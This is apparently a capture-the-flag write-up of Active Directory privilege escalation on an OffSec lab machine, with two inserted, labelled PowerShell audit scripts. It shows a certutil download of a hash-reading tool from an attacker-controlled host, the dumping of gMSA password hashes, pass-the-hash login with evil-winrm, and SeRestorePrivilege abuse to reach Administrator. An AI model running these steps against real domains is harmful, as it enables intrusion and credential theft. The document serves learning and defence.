# Priv Escalation

This is some big brain shit; I had to look at a walkthrough because I would've never figured this out.

So basically, after graphing the collected data with the pre-compiled BloodHound binary:

![](https://1831357707-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8orEMrbW2JUz78N6Vl5G%2Fuploads%2F2S1cyKu76gg1ntBDceka%2F2022-07-15_11-18.png?alt=media\&token=c86d3373-a1b7-4f91-90f4-cf5ab236def5)

You notice that the user svc\_apache can read gMSA passwords.

"SVC\_APACHE$@HEIST.OFFSEC is a Group Managed Service Account. The group WEB ADMINS@HEIST.OFFSEC can retrieve the password for the GMSA SVC\_APACHE$@HEIST.OFFSEC."

So Web Admins can also retrieve gMSA passwords.

We see from the output of `Get-ADGroupMember 'Web Admins'` that the user enox is also part of Web Admins. That's us!

![](https://1831357707-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8orEMrbW2JUz78N6Vl5G%2Fuploads%2FrJleQnfj5DoDyLpP7yUF%2F2022-07-15_11-50.png?alt=media\&token=7804dc19-d4af-46c2-be37-cb59bf0b3b05)

So that means that we can also read passwords like that user.

Using `GMSAPasswordReader.exe --accountname 'svc_apache'`, we are able to read the RC4 hash, which is just a hash that we can use to log in as that user.

```
*Evil-WinRM* PS C:\Users\enox> Get-ADServiceAccount -Filter {name -eq 'svc_apache'} -Properties * | Select CN,DNSHostName,DistinguishedName,MemberOf,Created,LastLogonDate,PasswordLastSet,msDS-ManagedPasswordInterval,PrincipalsAllowedToDelegateToAccount,PrincipalsAllowedToRetrieveManagedPassword,ServicePrincipalNames


CN                                         : svc_apache
DNSHostName                                : DC01.heist.offsec
DistinguishedName                          : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
MemberOf                                   : {CN=Remote Management Users,CN=Builtin,DC=heist,DC=offsec}
Created                                    : 7/20/2021 4:23:44 AM
LastLogonDate                              : 9/14/2021 8:27:06 AM
PasswordLastSet                            : 7/20/2021 4:23:44 AM
msDS-ManagedPasswordInterval               : 30
PrincipalsAllowedToDelegateToAccount       : {}
PrincipalsAllowedToRetrieveManagedPassword : {CN=DC01,OU=Domain Controllers,DC=heist,DC=offsec, CN=Web Admins,CN=Users,DC=heist,DC=offsec}
ServicePrincipalNames                      :



*Evil-WinRM* PS C:\Users\enox> Get-ADGroupMember 'Web Admins'


distinguishedName : CN=Naqi,CN=Users,DC=heist,DC=offsec
name              : Naqi
objectClass       : user
objectGUID        : 82c847e5-1db7-4c00-8b06-882efb4efc6f
SamAccountName    : enox
SID               : S-1-5-21-537427935-490066102-1511301751-1103



*Evil-WinRM* PS C:\Users\enox> certutil -urlcache -f http://192.168.49.105:443/GMSAPasswordReader.exe GMSAPasswordReader.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
*Evil-WinRM* PS C:\Users\enox> . ./GMSAPasswordReader.exe --accountname 'svc_apache'
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 1808D2C09D9E6A0EDC419A4B13868C92
[*]       aes128_cts_hmac_sha1 : 8146F49C50041D6F8F70D45D9F26AF27
[*]       aes256_cts_hmac_sha1 : 810B1963081C261DBDA3E91618943A59EA0A9B6DD48BAFA5E30098D0F7412707
[*]       des_cbc_md5          : B6E961D04679DA29

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 45EA837EDB477DDA17B5822AD768D0D7
[*]       aes128_cts_hmac_sha1 : 9F234A0EEC90B6AF9FC395D85CE938D5
[*]       aes256_cts_hmac_sha1 : 90321B028FB63CD44F37BA7F6829F5CBE4DAA1EE926A909EA9CFC607B52A0CA4
[*]       des_cbc_md5          : B0750E611F7FA14F

```

The rc4\_hmac value is the NTLM hash, so it can be used directly for pass-the-hash. Note that the tool prints both the old and the current value; the one under "Current Value" is the one that works.

```
evil-winrm -i 192.168.105.165 -u svc_apache$ -H 45EA837EDB477DDA17B5822AD768D0D7                                

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> 


```

Basically, the gMSA password can be read by remote users because Web Admins is listed in PrincipalsAllowedToRetrieveManagedPassword for svc\_apache, and enox is a member of Web Admins, so we had the right to read that password using `GMSAPasswordReader.exe --accountname 'svc_apache'`.
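As an added defensive check (not part of the original write-up): a PowerShell audit that lists, for every gMSA, which principals can retrieve its managed password and expands groups so indirect members such as enox via Web Admins appear. It assumes the RSAT ActiveDirectory module and read access to the gMSA objects; `Get-GmsaRetrievalAudit` is a name chosen for this example.

```powershell
# Added example (not from the write-up): audit which principals can retrieve each gMSA's
# managed password, expanding groups so indirect members (enox via Web Admins) are listed.
# Assumes the RSAT ActiveDirectory module and read access to the gMSA objects.
Import-Module ActiveDirectory

function Get-GmsaRetrievalAudit {
    param([string]$Server)   # optional DC to query; omitted = default domain

    $adArgs = @{}
    if ($Server) { $adArgs.Server = $Server }

    # PrincipalsAllowedToRetrieveManagedPassword is the friendly view of
    # msDS-GroupMSAMembership, the same property shown in the write-up's output.
    $gmsas = Get-ADServiceAccount @adArgs `
        -Filter "objectClass -eq 'msDS-GroupManagedServiceAccount'" `
        -Properties PrincipalsAllowedToRetrieveManagedPassword

    foreach ($gmsa in $gmsas) {
        foreach ($dn in $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
            $allowed = Get-ADObject @adArgs -Identity $dn
            # Expand groups recursively; a direct principal is reported as itself.
            $effective = if ($allowed.ObjectClass -eq 'group') { Get-ADGroupMember @adArgs -Identity $dn -Recursive } else { @($allowed) }

            foreach ($p in $effective) {
                # The host that runs the service (a computer object) is the expected case.
                # A user reaching this list means a person can recover the gMSA password.
                $finding = 'expected'
                if ($p.ObjectClass -ne 'computer') { $finding = 'REVIEW: non-computer principal can read gMSA password' }
                # Get-ADObject does not return SamAccountName by default, so fall back to Name.
                $who = if ($p.SamAccountName) { $p.SamAccountName } else { $p.Name }
                [pscustomobject]@{
                    GMSA          = $gmsa.SamAccountName
                    AllowedEntry  = $allowed.Name
                    EffectiveUser = $who
                    ObjectClass   = $p.ObjectClass
                    Finding       = $finding
                }
            }
        }
    }
}

# On the Heist output this flags svc_apache: Web Admins -> enox (user).
Get-GmsaRetrievalAudit | Where-Object Finding -ne 'expected' | Format-Table -AutoSize
```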

We then used the evil-winrm line above to get a shell as svc\_apache and checked its privileges:

```
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

```

As the svc\_apache user we have SeRestorePrivilege. We can exploit this.
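An added example, not from the write-up or the SeRestoreAbuse project: a PowerShell check for which accounts and groups hold SeRestorePrivilege on a host, by exporting the local User Rights Assignment with secedit and resolving the SIDs. It assumes local administrator rights to run secedit; `Get-PrivilegeHolders` is a name chosen here.

```powershell
# Added example (not from the write-up): list the accounts and groups that hold
# SeRestorePrivilege on this host. Requires local administrator rights for secedit.
function Get-PrivilegeHolders {
    param([string]$Privilege = 'SeRestorePrivilege')

    $cfg = Join-Path $env:TEMP 'user-rights-export.inf'
    # Export only the User Rights Assignment section of the local security policy.
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    try {
        # Lines look like: SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551
        $line = Get-Content $cfg | Where-Object { $_ -match "^$Privilege\s*=" }
    } finally {
        Remove-Item $cfg -ErrorAction SilentlyContinue
    }
    if (-not $line) { return @() }

    ($line -split '=', 2)[1].Trim() -split ',' | ForEach-Object {
        $entry = $_.Trim()
        $name  = $entry
        if ($entry.StartsWith('*')) {
            # Entries prefixed with '*' are raw SIDs; translate them to account names.
            try {
                $sid  = New-Object System.Security.Principal.SecurityIdentifier ($entry.Substring(1))
                $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
            } catch { $name = "$entry (unresolved)" }
        }
        [pscustomobject]@{ Privilege = $Privilege; Entry = $entry; Account = $name }
    }
}

# Anything beyond Administrators and Backup Operators deserves a second look, since
# SeRestorePrivilege bypasses file and registry ACLs on write.
Get-PrivilegeHolders | Format-Table -AutoSize
```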

First we clone the GitHub repo into Visual Studio Code on our Windows client.

{% embed url="https://github.com/xct/SeRestoreAbuse" %}

Afterwards, I transferred the SeRestoreAbuse.exe binary to the machine along with nc.exe.

![](https://1831357707-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8orEMrbW2JUz78N6Vl5G%2Fuploads%2Fki2s7TUsfPHvbLsa9iam%2F2022-07-15_13-06.png?alt=media\&token=59365c49-d19e-44ac-a58e-751df7975e5e)

And bam, we got Administrator access.
